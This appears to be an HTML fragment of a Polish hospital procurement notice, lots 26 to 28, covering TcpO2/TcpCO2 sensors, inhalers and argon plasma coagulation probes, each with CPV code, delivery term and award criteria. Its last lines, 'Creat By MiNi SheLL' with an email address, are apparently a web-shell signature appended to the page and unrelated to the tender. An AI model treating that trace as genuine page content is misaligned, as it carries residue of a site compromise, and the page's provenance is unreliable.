<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czujnik wielorazowy do pomiaru TcpO2/TcpCO2 do aparatu Tina	sztuka	2
2	Czujnik wielorazowy do pomiaru TcpO2 do aparatu Tina	sztuka	2
3	Zestaw do mocowania elektrod Tc do aparatu Tina TCM 400 opk a 100 szt 	opakowanie	8
4	Zestaw membranowy do elektrod TcpO2 aparatu Tina TCM 400 (opakowanie 12 szt)	opakowanie	8
5	Zestaw membranowy do elektrod TcpO2/TcpCO2 aparatu Tina TCM 400 (opakowanie 12 szt)	opakowanie	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Inhalator  o parametrach nie gorszych niż  typu Philips Respironics PRO Soft Touch wraz z wszystkimi akcesoriami pozwalającymi na pełne korzystanie z inhalatora. Gwarancja 2 lata. Przeglądy konserwacyjno - kontrolne (czestotliwość wg zaleceń producenta),  przez okres gwarancji w cenie dostawy.
sztuka	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sonda endoskopowa giętka do koagulacji plazmą argonową bocznie (typu APC 2200SW lub równoważna) , wielorazowego użytku, końcówka wyskalowana, min. długość 2,2mm-2,4mm do używania w diatermii/bimerze argonowym firmy Erbe, typ ICC200/APC300  posiadanej przez Zamawiającego. 2 lata gwarancji	sztuka	2
2	Sonda endoskopowa giętka do koagulacji plazmą argonową centralnie (typu APC 2200A lub równoważna) , wielorazowego użytku, końcówka wyskalowana, min. długość 2,2mm - 2,4mm do używania w diatermii/bimerze argonowym firmy Erbe, typ ICC200/APC300   posiadanej przez Zamawiającego. Gwarancja 2 lata. Przeglądy konserwacyjno - kontrolne (czestotliwość wg zaleceń producenta),  przez okres gwarancji w cenie dostawy.
sztuka	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com